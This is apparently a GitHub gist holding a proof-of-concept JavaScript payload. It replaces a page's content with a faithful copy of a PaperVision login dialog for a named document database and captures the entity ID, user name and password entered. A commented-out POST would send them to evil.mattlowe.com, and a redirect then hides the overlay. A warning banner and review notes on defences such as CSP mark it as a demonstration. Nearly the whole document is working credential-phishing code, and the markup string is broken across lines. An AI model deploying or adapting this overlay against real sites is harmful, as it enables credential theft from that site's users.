@mattlowe
Last active January 2, 2018 12:39
// Proof-of-concept: overwrite the page's #mainContent element with markup for a
// dijit-style login dialog (Entity ID, User Name and Password inputs plus a Login
// button with id "btnLogin"). The dialog is drawn inside the existing document and
// nothing here navigates, so the address bar keeps showing the original site.
// The markup ends with the author's red "WARNING: This page will steal credentials"
// paragraph, which marks the overlay as a demonstration.
// NOTE(review): the gist does not show how this script gets into the page; the
// overlay presumably mirrors the application's real login form - confirm against
// the target. Output encoding of untrusted data and a Content-Security-Policy that
// blocks injected script are the controls that stop this class of overlay.
// NOTE(review): the string literal below is split across two physical lines; a
// single-quoted JavaScript string cannot contain a raw newline, so the break is
// probably an artifact of how the page was captured.
document.getElementById("mainContent").innerHTML = '<div class="dijitDialog modal" id="loginMenu" widgetid="loginMenu" title="" style="display: block; opacity: 1; left: 650px; top: 356px;"> <div dojoattachpoint="titleBar" class="dijitDialogTitleBar" tabindex="0" wairole="dialog" role="dialog"> <span dojoattachpoint="titleNode" class="dijitDialogTitle"></span> <span dojoattachpoint="closeButtonNode" class="dijitDialogCloseIcon" dojoattachevent="onclick: hide" style="display: none;"> <span dojoattachpoint="closeText" class="closeText">x</span> </span> </div> <div dojoattachpoint="containerNode" class="dijitDialogPaneContent"> <div class="menuBorder"> <div class="menuHeader">Welcome to UBC Jurisdictional Document Database</div> <fieldset class="menuFieldSet"> <legend class="menuLegend">Login Information</legend> <div id="divEntityID" style="display: block;"> <label class="fieldLabel" for="txtEntityID" title="Entity ID (Alt + I)"> Entity <u>I</u>D:</label> <input id="txtEntityID" accesskey="I" autocomplete="off" tabindex="0" value=""><br> </div> <label class="fieldLabel" for="txtUserName" title="User Name (Alt + N)"> User <u>N</u>ame:</label> <input id="txtUserName" accesskey="N" autocomplete="off" tabindex="0" value=""><br> <label class="fieldLabel" for="txtPassword" title="Password (Alt + P)"> <u>P</u>assword:</label> <input id="txtPassword" accesskey="P" autocomplete="off" name="txtPassword" tabindex="0" type="password"><br> <label class="fieldLabel"> Source IP:</label><span class="desc">10.10.1.80</span> </fieldset> <div class="divButtons textAlign-center"> <div class="dijit dijitLeft dijitInline dijitButton dijitButton" dojoattachevent="onclick:_onButtonClick,onmouseenter:_onMouse,onmouseleave:_onMouse,onmousedown:_onMouse" title="Login (Enter)" widgetid="btnLogin"><div class="dijitRight"><input type="submit" class="dijitStretch dijitButtonNode dijitButtonContents" dojoattachpoint="focusNode,titleNode" type="button" wairole="button" 
waistate="labelledby-btnLogin_label" role="button" aria-labelledby="btnLogin_label" id="btnLogin" tabindex="0" aria-valuenow="" aria-disabled="false"><span class="dijitInline " dojoattachpoint="iconNode"><span class="dijitToggleButtonIconChar">✓</span></span><span class="dijitButtonText" id="btnLogin_label" dojoattachpoint="containerNode"></span></div></div> </div> <fieldset name="name" id="loginInfoFieldSet" class="menuFieldSet"><div class="loginInfo">For System Support or Password Resets,<br>please call Toll Free 1-877-824-9541<br>or Email your request to [email protected]</div></fieldset> <div id="copyrightInfo"><div class="sub1"><img src="https://206.159.179.50/Images/swirl_24x24.png"><a href="javascript:displayHelp(\'About\');" tabindex="-1">Powered by PaperVision<sup>®</sup></a></div><div class="sub2">Copyright <sup>©</sup> 1998-2018 Digitech Systems, Inc. All Rights Reserved.</div><div class="sub2">PaperVision and the PaperVision logo are registered trademarks of <br>Digitech Systems, Inc.</div></div> </div> <p style="color:red; text-align:center">WARNING: This page will steal credentials.<br>DO NOT USE REAL PASSWORDS</p> </div> <span dojoattachpoint="tabEnd" dojoattachevent="onfocus:_cycleFocus" tabindex="0"></span> </div>';
// Centre the #loginMenu dialog inside document.body, replacing the hard-coded
// left/top pixel values carried in the dialog's inline style attribute.
var lm = document.getElementById("loginMenu");
[
    { edge: "left", size: "clientWidth", lift: 0 },
    // "lift" is subtracted before halving, so the dialog sits 50px above centre.
    { edge: "top", size: "clientHeight", lift: 100 }
].forEach(function (axis) {
    var spare = document.body[axis.size] - lm[axis.size] - axis.lift;
    lm.style[axis.edge] = spare / 2 + "px";
});
// Demonstration click handler for the Login button (#btnLogin).
// It reads the three login inputs, shows their values to the user in an alert,
// and then navigates to "/". The network exfiltration step is commented out
// below, so as written nothing leaves the browser.
// Defender's view: the only visible effects in this demo are the two alerts and
// the redirect. A CSP connect-src allow-list would block the cross-origin POST
// sketched in the commented lines if it were enabled.
document.getElementById("btnLogin").addEventListener("click", function (evt) {
    var valueOf = function (fieldId) {
        return document.getElementById(fieldId).value;
    };

    // Values typed into the dialog, read in the same order as the form fields.
    var data = {
        entity: valueOf("txtEntityID"),
        user: valueOf("txtUserName"),
        pass: valueOf("txtPassword")
    };

    var notice = "The following data will be posted to an attacker controlled page:"
        + "\nEntity: " + data.entity
        + "\nUser: " + data.user
        + "\nPass: " + data.pass;
    alert(notice);

    // Exfiltration step, left disabled by the author (kept as written):
    // var request = new XMLHttpRequest();
    // request.open('POST', 'https://evil.mattlowe.com/stolendata', false);
    // request.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
    // request.send(data);

    alert("Now redirecting to / hide what was done.");

    // Navigating to the site root discards the document that holds the overlay.
    document.location = "/";
});